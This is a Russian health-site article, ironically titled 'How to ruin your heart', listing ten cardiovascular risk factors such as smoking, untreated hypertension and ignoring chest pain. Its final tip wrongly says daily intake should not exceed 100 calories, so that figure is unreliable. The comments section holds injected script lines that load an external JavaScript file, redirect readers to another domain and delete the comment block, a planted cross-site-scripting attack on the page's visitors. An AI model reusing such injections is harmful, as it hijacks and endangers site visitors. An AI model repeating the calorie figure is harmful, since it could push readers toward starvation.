Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как угробить свое сердце?...  >>  Как угробить свое сердце?!
 
Обратная связь
 

Как угробить свое сердце?!

Размер шрифта
13 мая 2014 00:00
  • google_analytics: false
  • Нравится

Когда речь заходит о здоровье сердца, то следует помнить, что существуют факторы риска, на которые мы не можем повлиять (например, возраст, семейный анамнез), но намного больше факторов риска, которые мы можем изменить.

Как угробить свое сердце?!

1. Продолжайте курить

Курение является основной причиной сердечно-сосудистых заболеваний: оно повышает артериальное давление, приводит к образованию тромбов и снижает уровень «хорошего» холестерина. Хотя бросить курить достаточно сложно, все же игра стоит свеч. Уже через год после того как вы бросите курить, риск сердечно-сосудистых заболеваний уменьшиться вдвое, а через 10 лет будет таким же, как будто вы никогда не курили.

2. Не обращайте внимания на боль в груди

Любая боль в груди – это повод обратиться к врачу. Если боль в груди возникает при физической нагрузке, то она, скорее всего, является проявлением ишемической болезни сердца и требует консультации кардиолога. Такая боль носит давящий, сжимающий характер, локализуется за грудиной и проходит в покое или после приема нитроглицерина. Если боль очень сильная, отдает в левую руку или челюсть, сопровождается чувством страха и потливостью, необходимо вызвать скорую помощь.

3. Смиритесь с тем, что заболевание неизбежно

Наличие сердечно-сосудистых заболеваний у ближайших родственников действительно является фактором риска. Однако развитие сердечно-сосудистых заболеваний обусловлено не только наличием определенных генов, но и образом жизни. В частности, снижение уровня «плохого» холестерина на 50% обеспечивает такое же уменьшение риска развития сердечно-сосудистых заболеваний.

4. Не ходите к врачу

Если вы не проходите диспансеризацию, вы рискуете своим здоровьем. Некоторые заболевания, в частности атеросклероз и артериальная гипертензия, зачастую не сопровождаются никакими симптомами, поэтому их можно выявить только при обследовании. Даже если вам кажется, что диспансеризация – это простая формальность, не жалейте времени: ваше здоровье в ваших руках.

5. Ведите малоподвижный образ жизни

Помните известную истину: движение – это жизнь? Она совершенно справедлива, ведь малоподвижный образ жизни увеличивает риск развития сердечно-сосудистых заболеваний. Физическая активность позволяет снизить артериальное давление, уровень холестерина, массу тела, улучшить функцию кровеносных сосудов и избавиться от стресса. Даже если вы давно ведете малоподвижный образ жизни, никогда не поздно его поменять.

6. Не принимайте лекарства

Как только вы перестанете принимать лекарства, которые назначил кардиолог, вы можете столкнуться с такими страшными заболеваниями, как инфаркт миокарда и инсульт. Пока вы принимаете эти препараты, вы находитесь под их защитой. Если вы хотите изменить дозу того или иного препарата или вообще отказаться от него, не принимайте необдуманных решений: прежде всего посоветуйтесь с врачом.

7. Не обращайте внимания на свою талию

Скопление жировой ткани в области талии (так называемое ожирение по типу яблока) может быть проявлением метаболического синдрома. Под этим понятием понимается сочетание нескольких факторов риска сердечно-сосудистых заболеваний и сахарного диабета. Большая талия увеличивает риск развития сердечно-сосудистых заболеваний в два раза.

8. Игнорируйте сердцебиение

Сердцебиение, которое сопровождается неприятными ощущениями в груди, одышкой или потерей сознания, может указывать на нарушение ритма. При нарушениях ритма сердечные сокращения могут быть частыми, редкими или нерегулярными. Если сердцебиение бывает редко и быстро проходит, то беспокоиться не о чем. Но в том случае, когда подобные эпизоды случаются часто или сопровождаются симптомами, следует обратиться к врачу.

9. Не контролируйте артериальное давление

Хороший способ угробить свое сердце – не лечить артериальную гипертензию. Повышение артериального давления заставляет сердце работать с большей силой, что рано или поздно приводит к сердечной недостаточности. Кроме того, стенки артерий теряют эластичность, что повышает риск развития инфаркта миокарда и инсульта. Любой человек может самостоятельно контролировать артериальное давление: достаточно купить тонометр.

10. Ешьте, сколько влезет

Избыточная масса тела и ожирение повышают риск развития сердечно-сосудистых заболеваний и уменьшают продолжительность жизни. Даже небольшое снижение массы тела может иметь решающее значение для вашего здоровья. Старайтесь употреблять больше овощей, фруктов и орехов, откажитесь от продуктов, содержащих насыщенные жиры и холестерин, и переходите на рыбку, оливки, оливковое масло и авокадо. Постарайтесь, чтобы суточный калораж не превышал 100 калорий.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:52

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Одним выстрелом двух зайцев! Обезболивающее лечит диабет   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!   Ешь фаст фуд, не моешь рот – будет инфаркт!  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 

Слайдшоу

1
6 суперпродуктов от диабета
Чем страшен диабет?
Зачем спать 10 затем

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.